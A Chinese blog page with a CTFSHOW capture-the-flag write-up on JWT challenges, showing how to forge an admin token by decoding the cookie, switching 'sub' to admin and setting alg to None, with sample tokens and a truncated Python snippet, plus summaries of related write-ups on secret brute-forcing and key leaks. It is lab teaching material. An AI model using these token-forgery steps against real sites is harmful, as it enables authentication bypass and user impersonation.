[CTFSHOW]JWT

最新推荐文章于 2025-09-24 18:06:24 发布
原创 最新推荐文章于 2025-09-24 18:06:24 发布 · 5.7k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

文章目录

前言

有些师傅向我咨询WP,索性就发了吧,其实早就写好了,只是懒,在github仓库里囤着,有人说我写错了,这样吧群主改题也不是我能控制的,我能做的就是简简单单分享,也不想重做这些题仅参考

JWT简介

可以看看我的Github总结给自己看的,Y4tacker

CTFSHOW Web345

首先打开题目,查看源码,接下来访问/admin被跳转回主页啥也没有发生

where is flag?
<!-- /admin -->

当然知道这个板块是JWT,自然而然我们看一眼Cookie,发现名为auth的一个cookie为

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3sic3ViIjoidXNlciJ9XQ

通过base64解密或者去jwt.io解码也行,得到结果

{"alg":"None","typ":"jwt"}[{"sub":"user"}]

所以我们尝试把sub对应的键值修改

{"alg":"None","typ":"jwt"}[{"sub":"admin"}]

把前面部分和后面部分分别base64-encode

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0

后面

W3sic3ViIjoiYWRtaW4ifV0=

把这两部分用点(.)拼接两部分并去掉等于号

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3sic3ViIjoiYWRtaW4ifV0

此时拿着这一串cookie去替换掉原来的值,之后访问/admin即可获取flag

CTFSHOW Web346

前置知识

JWT支持将算法设定为“None”。如果“alg”字段设为“ None”,那么签名会被置空,这样任何token都是有效的。
设定该功能的最初目的是为了方便调试。但是,若不在生产环境中关闭该功能,攻击者可以通过将alg字段设置为“None”来伪造他们想要的任何token,接着便可以使用伪造的token冒充任意用户登陆网站。

开始做题

首先拿到cookie

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYwOTIzNjg3MCwiZXhwIjoxNjA5MjQ0MDcwLCJuYmYiOjE2MDkyMzY4NzAsInN1YiI6InVzZXIiLCJqdGkiOiI5NDNkMGIzMjM3ODA2NjU5ZDJlMjA1ZTQyYjMxOTQ5NCJ9.9TUQLyYKs97ceFhZQ4BzkAuug6nCgLoMAbLH88kSOwo

解码

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iss": "admin",
  "iat": 1609236870,
  "exp": 1609244070,
  "nbf": 1609236870,
  "sub": "user",
  "jti": "943d0b3237806659d2e205e42b319494"
}

我们需要把sub字段改为admin

但是如果把签名算法改为none的化jwt.io那个网站就无法生成,这个时候可以使用python生成

import jwt

# payload
token_dict = {
   
   
  "iss"
最低0.47元/天 解锁文章
JWT-ctfshow
unexpectedthing的博客
10-07 407
文章目录JWT的简介web354(无加密)web346web347web348web349web350 JWT的简介 JWT简要介绍 JSON Web Token 入门教程 明确header,payload,signature三个东西的组成原理 明确jwt的作用和与session_id的区别所在。 base64URL的加密算法。 web354(无加密) F12看到有个/admin的文件目录,进去之后访问不了 然后抓包发现一串cookie中的token,就是JWT 我们将 第一部分{“alg”:“None”
ctfshow——JWT
qq_55202378的博客
05-01 1744
抓个包,可以看到cookie部分使用JWT(Json Web Token)。 先用base64将JWT进行解密,修改为admin,再用base64进行加密。再访问 这里使用了HS256加密方式,方法:alg字段改为,sub改为,对每一段分别用base64进行加密,然后用拼接起来,注意最后一个点不能少。都可以用jwt-cracker进行爆破,获取密匙。或者用脚本跑。 web 349——非对称加密算法RS256私钥泄漏 根据提示,大致意思就是访问,服务器会使用RS256算法私钥加密一段字符串作为cookie
ctfshow JWT 专题
会下雪的晴天
01-02 720
title: ctfshow JWT 专题 date: 2020-12-29 15:31:47 categories: ctfshow csdn随缘更新了 JWT(json web token)跨域认证解决方案,入门教程 web345 web346 web347 web348 web345 没加密,直接伪造,推荐网站:https://jwt.io/ web346 有加密,不能爆破,改算法为none,sub为admin即可 web347 弱口令,盲猜:123456 web348 C语言爆破工具 .
ctfshow web应用安全与防护 第四章 全解析供参考
最新发布
2403_89878563的博客
09-24 1070
本文介绍了三种常见的Web安全漏洞攻击方法:1. Session固定攻击 - 利用不变的Session ID劫持用户会话;2. JWT令牌伪造 - 通过修改JWT令牌参数(如将alg改为none)绕过验证;3. Flask Session伪造 - 通过获取密钥伪造管理员Session。每种方法都详细说明了攻击原理和具体实施步骤,包括获取密钥、构造恶意请求等关键环节。文章还涉及文件读取、代码审计等辅助技术,以及弱口令爆破等基础攻击手段。这些漏洞都可能导致权限提升,最终获取系统敏感信息或flag。
ctfshow-jwt
2401_87493916的博客
12-25 1228
将信息进行安全的封装,以json的方式传递三部分分别是:Header{'typ': 'JWT' token类型'alg': 'HS256' 算法名称}将这个信息进行base64加密,构成了第一部分payload载荷,存放主要信息的地方{"sub": '1234567890', 标准中注册的声明"name": 'john', 公共的声明"admin" :true 私有的声明}base64加密,得到jwt第二部分第三部分Signature签名签名是将加密后的header和payload用点拼接,再将结果通过He
CTFshow JWT
starttv的博客
11-24 566
JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案,该规范允许我们通过JWT在用户和服务器之间安全可靠地传递信息。
ctfshow jwt web入门
2301_81040377的博客
06-03 788
jwt令牌由三部分组成,由分割header示例payload示例。
CTFSHOW jwt
羽的博客
12-30 6243
可以先了解下jwt jwt由三部分组成header、payload、signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } payload示例 { "sub": "1234567890", "name": "John Doe" } signature jwt的第三部分是一个签证信息,这个签证信息由三部分组成: header (base64编码) payload (base64编码) secret(密钥) 这个部分需要base64加密后的he
ctfshow jwt
01-03
### CTFShow JWT 挑战解题思路 在处理涉及 JSON Web Token (JWT) 的安全挑战时,理解其工作原理至关重要。JWT 是一种用于在网络应用环境间传递声明的紧凑型、URL 安全的方法[^3]。 #### 了解 JWT 结构 JWT 主要由...
ctfshow JWT
09-08
CTFShow JWT是一个由头部、有效载荷和签名三部分组成的JSON Web Token。其中,头部包含了JWT的类型和使用的算法,有效载荷包含了一些信息,比如发行者、颁发时间、过期时间等,签名则用于验证JWT的完整性和真实性。 ...
ctfshowjwt详解
cosmoslin的博客
09-29 2513
web345(无加密) 进入后F12,发现提示/admin 要注意使用 url 访问网页时 /admin 表示访问 admin.php 文件 /admin/ 表示访问 admin/目录下的文件,默认是 index.php 很像文件夹,所以此处应该访问 /admin/ 查看cookie eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2MzI0OTc1MDksImV4cCI6MTYzMjUwNDcwOSwibmJmIjox
ctfshow web入门 JWT
Anton1a的博客
02-24 4744
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
JWT漏洞(ctfshow345-350)
m0_67284865的博客
07-09 588
JWT 可以使用密钥(使用 HMAC 算法)或使用 RSA 的公钥/私钥对进行签名。当用户登录某一页面是,服务端会把一段加密的数据返回,相当于代替cookie作用,当下一次打开此登录页面时,客户端会将这一段自动发送给服务器端,服务器端根据收到的这一段数据,返回不同的页面,基本功能与cookie类似。这里盲猜123456,然后把user改成admin,用修改后的jwt加载进入,访问admin目录就可以了。得到密钥,然后user改成admin,密钥aaab,得到jwt载入,访问admin得到flag。
CTF之JWT与赛题
Neolock的博客
07-19 968
JWT(JSON Web Token)是一种开放标准的安全传输协议,由三部分组成:头部(算法和类型声明)、载荷(用户数据/元数据)和签名(验证完整性)。其核心应用包括身份认证、API授权,支持HMAC/RSA等签名算法。关键风险点在于Payload仅Base64编码(非加密)、算法篡改(如"none"攻击)、弱密钥爆破等。安全实践需强制算法校验、使用强密钥(HS256)或非对称加密(RS256)、设置短有效期。在CTF场景中,通过修改JWT声明+密钥爆破(如hashcat工具)可绕过权限
ctfshow jwt学习
hcja666的博客
05-02 1249
JSON Web Token(JWT)是一个开放标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在各方之间安全地传输信息作为JSON对象。此信息可以被验证和信任,因为它是数字签名的。JWT可以使用秘密(使用HMAC算法)或使用RSA或ECDSA的公钥/私钥对进行签名。Header报头Payload有效载荷Signature签名因此,JWT通常看起来如下所示。Header报头Payload有效载荷iss:发行人exp:到期时间sub:主题aud:用户。
ctf web 的一些writeup jwt以及黑客游戏
qq_42520737的博客
08-09 4025
http://54.223.83.192:8877/ jwt 登陆问题 JSON Web Token(JWT)是一个开放式标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在各方之间以JSON对象安全传输信息。这些信息可以通过数字签名进行验证和信任。可以使用秘密(使用HMAC算法)或使用RSA的公钥/私钥对对JWT进行签名。       这道题的解题方式就是对其进行登陆抓...
ctf.show的JWT(web345-web350)
wanan的博客
09-03 1035
ctf.show的JWT(web345-web350)
从SCTF看JWT安全 (附SCTF web writeup)
蚁景网安学院
03-30 673
原创作者:Fz41 这两天在打SCTF,有一题涉及到JWT的简单的知识,现在来把JWT相关的知识汇总一下,虽然不是主要的考察内容,但是作为一个基础知识,还是要掌握的。 JWT技术介绍 来源 用户认证的方式通常有两种,传统的session认证 和 基于token方式. 传统的session认证的缺陷 传统的session认证,随着不同客户端用户的增加,独立的服务器已无法承载更多的用户,而这时候基于s...
ctfshow web入门 jwt(持续更新)
Lum1n0us's Blog
08-02 1877
文章目录基础知识web345web346-347web348 基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值